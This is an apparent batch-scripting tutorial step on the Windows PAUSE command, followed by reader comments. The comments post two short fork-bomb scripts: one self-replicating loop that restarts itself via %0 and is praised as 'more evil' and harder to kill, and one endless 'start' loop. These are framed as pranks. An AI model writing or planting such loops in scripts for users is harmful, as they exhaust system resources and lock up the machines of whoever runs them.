Step 3PAUSE Command
I mainly use this command so that the Command Prompt will stay open long enough for a user to read the ECHO.
If you have been using Batch, as you should be, you will have noticed that the Command window will close automatically if the Batch is not run from the Command Prompt itself.
The {{{
PAUSE
}}} comes in handy in these situations.
It does as its name implies! It Pauses until the user has pressed any key.
As said before, I use this to keep the Command Prompt open so people can freak out about the messages they see. ;-)
| « Previous Step | Download PDFView All Steps | Next Step » |








































you just have to kill one process and it stops.
the cmd windows don't do nothing
but if u make something like this:
set x=%0
:top
start %x%
goto top
it will be a much more evil one and harder to kill because EACH new program will replicate making new programs that make new programs that make new programs that make new programs that make new programs that ma.............
so to stop this one you should kill ALL the bombs in one time which is really hard to do...
this is NetworkNinja's code:
:bomb
start
goto bomb
ping localhost -n 1 >nul 1 to 2 for a quicker pause 3 for a fast pause etc